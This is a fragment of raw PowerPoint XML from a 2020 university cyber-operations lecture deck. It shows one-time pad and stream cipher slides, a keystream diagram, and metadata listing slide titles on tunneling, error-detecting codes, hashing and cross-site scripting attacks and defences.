                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF6600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>E</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF6600"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF6600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>L</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF6600"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF6600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>L</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF6600"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF6600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>O</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF6600"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF6600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>message</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF6600"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>CIS4930/CIS5930 Practical Cyber Operstions Fundamentals 2020</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Slide Number Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2F0E42FC-4E2C-4324-A868-2EE1E72D6B75}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3109820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14300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="608321"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stream ciphers, computational </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="608321"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="608321"/>
                </a:solidFill>
              </a:rPr>
              <a:t>computationally hard to crack).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="608321"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Same as one-time pad except that the secret key is generated by a pseudo-random number generator (PRNG), that is share by the sender and receiver. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="274638"/>
            <a:ext cx="8077200" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>One-time pad &amp; stream ciphers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="AutoShape 2" descr="Image result for stream ciph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1" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2157984" y="3638550"/>
            <a:ext cx="3938016" cy="2628900"/>
            <a:chOff x="2157984" y="3638550"/>
            <a:chExt cx="3938016" cy="2628900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Group 6"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2157984" y="3707130"/>
              <a:ext cx="3938016" cy="2560320"/>
              <a:chOff x="2783715" y="3714750"/>
              <a:chExt cx="3938016" cy="256032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7790" y="3714750"/>
                <a:ext cx="3730358" cy="256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194949" y="4453128"/>
                <a:ext cx="878317" cy="387798"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr">
                  <a:lnSpc>
                    <a:spcPct val="80000"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                    <a:solidFill>
                      <a:srgbClr val="0070C0"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>k</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="0070C0"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>eystream</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="0070C0"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr">
                  <a:lnSpc>
                    <a:spcPct val="80000"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="0070C0"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>generator</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0070C0"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="TextBox 5"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2783715" y="5289987"/>
                <a:ext cx="1758815" cy="402290"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr">
                  <a:lnSpc>
                    <a:spcPts val="1200"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                    <a:solidFill>
                      <a:srgbClr val="0070C0"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>k</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="0070C0"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>eystream</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="0070C0"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr">
                  <a:lnSpc>
                    <a:spcPts val="1200"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0"/>
                  <a:t>(pseudo-random </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1" smtClean="0"/>
                  <a:t>bits</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
                  <a:t>tring</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                  <a:t>)</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="TextBox 8"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5407797" y="4453128"/>
                <a:ext cx="878317" cy="387798"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr">
                  <a:lnSpc>
                    <a:spcPct val="80000"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                    <a:solidFill>
                      <a:srgbClr val="0070C0"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>k</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="0070C0"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>eystream</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="0070C0"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr">
                  <a:lnSpc>
                    <a:spcPct val="80000"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="0070C0"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>generator</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0070C0"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="TextBox 7"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4993374" y="5257800"/>
                <a:ext cx="1728357" cy="400110"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr">
                  <a:lnSpc>
                    <a:spcPts val="1200"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                    <a:solidFill>
                      <a:srgbClr val="0070C0"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>k</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="0070C0"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>eystream</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="0070C0"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr">
                  <a:lnSpc>
                    <a:spcPts val="1200"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0"/>
                  <a:t>(pseudo-random </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1" smtClean="0"/>
                  <a:t>bitstring</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0"/>
                  <a:t>)</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="TextBox 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2667000" y="3657600"/>
              <a:ext cx="628698" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                <a:t>   small</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" b="1"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3950" y="3638550"/>
              <a:ext cx="6286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3" name="Footer Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>CIS4930/CIS5930 Practical Cyber Operstions Fundamentals 2020</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Slide Number Placeholder 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2F0E42FC-4E2C-4324-A868-2EE1E72D6B75}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37360100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609</TotalTime>
  <Words>2938</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>399</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Adjacency</vt:lpstr>
      <vt:lpstr>Background materials</vt:lpstr>
      <vt:lpstr>Topics</vt:lpstr>
      <vt:lpstr>A.   SSH, tunneling and VPNs</vt:lpstr>
      <vt:lpstr>Virtual Private Network Security Models</vt:lpstr>
      <vt:lpstr>Point-to-point connections, tunneling</vt:lpstr>
      <vt:lpstr>Telnet</vt:lpstr>
      <vt:lpstr>One-time pad &amp; stream ciphers</vt:lpstr>
      <vt:lpstr>One-time pad &amp; stream ciphers</vt:lpstr>
      <vt:lpstr>One-time pad &amp; stream ciphers</vt:lpstr>
      <vt:lpstr>B.  Encodings (codes)</vt:lpstr>
      <vt:lpstr>Encodings (codes)</vt:lpstr>
      <vt:lpstr>1. Error Detection Codes             Parity  Checks, Checksums</vt:lpstr>
      <vt:lpstr>1. Error Detection Codes             Cyclic Redundancy Checks</vt:lpstr>
      <vt:lpstr>1. Error Detection Codes             Cyclic Redundancy Checks</vt:lpstr>
      <vt:lpstr>Cyclic Redundancy Checks: CRC32</vt:lpstr>
      <vt:lpstr>2. Error Correction Codes </vt:lpstr>
      <vt:lpstr>3.  Encryption/Decryption             (symmetric key)</vt:lpstr>
      <vt:lpstr>4. (Cryptographic) Hash</vt:lpstr>
      <vt:lpstr>4. (Cryptographic) Hashing</vt:lpstr>
      <vt:lpstr>Cross-site attacks </vt:lpstr>
      <vt:lpstr>Cross-site scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cause &amp; effect of HTML XSS</vt:lpstr>
      <vt:lpstr>Code Insertion</vt:lpstr>
      <vt:lpstr>Code Insertion</vt:lpstr>
      <vt:lpstr>Cross-site scripting</vt:lpstr>
      <vt:lpstr>Cross-site scripting</vt:lpstr>
      <vt:lpstr>Cross-site scripting</vt:lpstr>
      <vt:lpstr>Write an XSS cookie stealer to steal passwords</vt:lpstr>
      <vt:lpstr>Stealing a cookie</vt:lpstr>
      <vt:lpstr>Categories of XSS attacks </vt:lpstr>
      <vt:lpstr>Stored (persistent) attacks</vt:lpstr>
      <vt:lpstr>Reflected (non-persistent) XSS</vt:lpstr>
      <vt:lpstr>DOM based XSS (Document Object Model)</vt:lpstr>
      <vt:lpstr>Defending against XSS attacks</vt:lpstr>
      <vt:lpstr> Whitelist Model</vt:lpstr>
      <vt:lpstr> Whitelist Model The OWASP Prevention Cheat Sheet list proposes 5 Rules: </vt:lpstr>
      <vt:lpstr>OWASP Enterprise Security API (ESAPI)</vt:lpstr>
      <vt:lpstr>HTML defense (sanitizing) filters</vt:lpstr>
      <vt:lpstr>Attack Code discrimination</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>FSU CS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SSH, tunneling and VPNs</dc:title>
  <dc:creator>Burmester</dc:creator>
  <cp:lastModifiedBy>Burmester</cp:lastModifiedBy>
  <cp:revision>62</cp:revision>
  <cp:lastPrinted>2020-02-13T17:17:01Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-01-15T13:12:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-02-13T20:39:35Z</dcterms:modified>
</cp:coreProperties>
</file>